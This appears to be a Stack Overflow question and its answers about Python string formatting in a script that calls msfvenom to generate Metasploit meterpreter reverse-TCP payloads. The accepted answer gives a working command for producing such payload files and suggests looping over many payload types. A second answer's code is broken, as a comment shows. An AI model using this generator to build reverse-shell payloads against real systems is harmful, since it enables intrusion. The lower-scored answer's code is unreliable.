# Appending variables as strings when passing command line arguments in python 2.7.12

Tags: python

I am attempting to create a Metasploit payload generator with Python 2.7.12. It generates many malicious payloads utilizing `msfvenom`.

First I utilize the `%s` and `%d` format operators.

```
call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s",   
"LPORT=%s", "-e %s", "-i %d", "-f %s", "> %s.%s"]) % (str(lhost), 
str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop))
```

This error returns

```
/usr/bin/msfvenom:168:in `parse_args': invalid argument: -i %d 
(OptionParser::InvalidArgument)
from /usr/bin/msfvenom:283:in `<main>'
Traceback (most recent call last):
    File "menu.py", line 74, in <module>
  call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", 
"LPORT=%s", "-e %s", "-i %d", "-f %s", "> %s.%s"]) % (str(lhost), 
str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop))
TypeError: unsupported operand type(s) for %: 'int' and 'str'
```

I am able to understand that msfvenom is not able to parse the argument I pass, which was the iteration flag, `-i`. Following that I see an error from Python, `TypeError`.

After conducting some research, I decided to use `.format()`, since

```
call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={0}",   
"LPORT={1}", "-e {2}", "-i {3}", "-f {4}", "> {5}.{6}"]).format(lhost,  
lport, encode, iteration, formatop, payname, formatop)
```

It returns

```
AttributeError: 'int' object has no attribute 'format'
```

What should I do? Also are there anyways I can optimize my program and instead of copy and pasting the same line, and changing the payload type for 15 options?

Comment: you need to call `format` on the string, i.e., `"the value is : {}".format(1)`

Answer (score 0, accepted):

You cannot use `format` on the result of the `call(...)`. You should format each component:

```
with open("{}.{}".format(payname, format), 'w') as outfile:
    call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={}".format(lhost), "LPORT={}".format(lport), "-e", str(encode), "-i", str(iteration), "-f", str(format)], stdout=outfile)
```

Note that the redirection is replaced with an explicitly opened file, because `subprocess.call` will not pass that to the shell unless you enable the unsafe `shell=True` argument.

To repeat this multiple times with a different payload is easy: create an array with the payloads then put this code into a loop (or, perhaps clearer, a function called with one payload at a time).

Answer (score -1):

A good trick is to use `split` on your command to create the list that's passed to `call`, this will make the the variable substitution cleaner too:

```
call("msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -e {2} -i {3} -f {4} > {5}.{6}"
     .split().format(lhost,  lport, encode, iteration, formatop, payname, formatop))
```

Comment: Would this be applicable to Python 2.7.x? An error that was returned: 'AttributeError: 'list' object has no attribute 'format''